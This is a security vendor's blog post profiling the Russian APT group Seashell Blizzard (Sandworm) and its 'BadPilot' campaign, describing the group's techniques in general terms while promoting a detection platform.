Seashell Blizzard Attack Detection: A Long-Running Cyber-Espionage “BadPilot” Campaign by russian-linked Hacking Group  – Source: socprime.com

A nefarious russia’s APT group Seashell Blizzard also known as APT44 has been waging global cyber campaigns since at least 2009. Defenders recently spotted a new long-lasting access campaign called “BadPilot,” reinforcing the group’s focus on stealthy initial infiltration and leveraging a set of advanced detection evasion techniques.

Detect Seashell Blizzard Attacks

For more than a decade, the russia-backed Seashell Blizzard APT group – also tracked as UAC-0145, APT44 or Sandworm – has persistently targeted Ukraine, focusing on critical sectors. Since the full-scale invasion, this GRU-linked military cyber-espionage unit has escalated its activity, using Ukraine as a testing ground to refine its malicious TTPs before expanding its offensive campaigns to global targets.

SOC Prime Platform for collective cyber defense equips security professionals with a set of curated detection algorithms to proactively withstand Seashell Blizzard operations backed by a complete product suite for AI-powered detection engineering, automated threat hunting, and advanced threat detection. Just click the Explore Detections button below and immediately drill down to a relevant detection stack. 

Explore Detections

All the rules are compatible with multiple SIEM, EDR, and Data Lake platforms and mapped to MITRE ATT&CK to streamline threat investigation. Additionally, each rule is enriched with extensive metadata, including CTI references, attack timelines, triage recommendations, audit configurations, and more. 

For more detection content against related malicious activity associated with the notorious russia-linked cyber-espionage collective known under diverse monikers and identifiers, apply the following tags “Sandworm,” “APT44,” or “Seashell Blizzard” to streamline your search across SOC Prime Platform.

Seashell Blizzard Operations Analysis

Seashell Blizzard also tracked as APT44, Sandworm, Voodoo Bear, or UAC-0082, is a high-impact russian hacking collective tied to GRU Unit 74455. Active for over a decade, threat actors have conducted widespread adversary campaigns targeting organizations in the U.S., Canada, Australia, Europe, and Asia. 

Known for maintaining stealthy access to impacted systems, adversaries use a mix of open-source and custom-built tools to carry out cyber espionage. The group shows a strong interest in ICS and SCADA environments, with previous attacks resulting in major disruptions to essential infrastructure, with a notable impact on energy systems.

AttackIQ researchers have recently shed light on the group’s BadPilot campaign, a stealthy and prolonged operation aimed at breaching targeted networks. The campaign primarily leverages spear-phishing emails and security flaws to infiltrate systems. After gaining a foothold, access is often handed off to other adversaries within the group to proceed with further exploitation and intelligence gathering.

Notably, Seashell Blizzard has targeted Ukraine since russia’s full-fledged invasion of Ukraine. In April 2022, CERT-UA, alongside Microsoft and ESET, issued a warning regarding the world’s second-ever power outage caused by a cyberattack, traced back to UAC-0082 (aka Seashell Blizzard). The attackers used Industroyer2, a new variant of the infamous Industroyer malware, paired with the notorious CaddyWiper malware. 

In the latest BadPilot campaign, hackers employ highly persistent techniques to sustain access, even after system reboots or password changes, by altering or creating Windows services. They achieve this using built-in Windows utilities, specifically the sc command-line tool, so they can set up and confirm new services. To stay under the radar, they also abuse Windows BITS component, allowing them to stealthily deploy malware samples during periods of low system activity, blending in with normal network operations.

To minimize the risks of Seashell Blizzard operations, security teams should consistently evaluate their defenses. SOC Prime Platform for collective cyber defense offers a future-proof enterprise-ready product suite backed by AI, automation, and actionable threat intelligence to ensure businesses can gain a competitive edge over increasing adversary capabilities.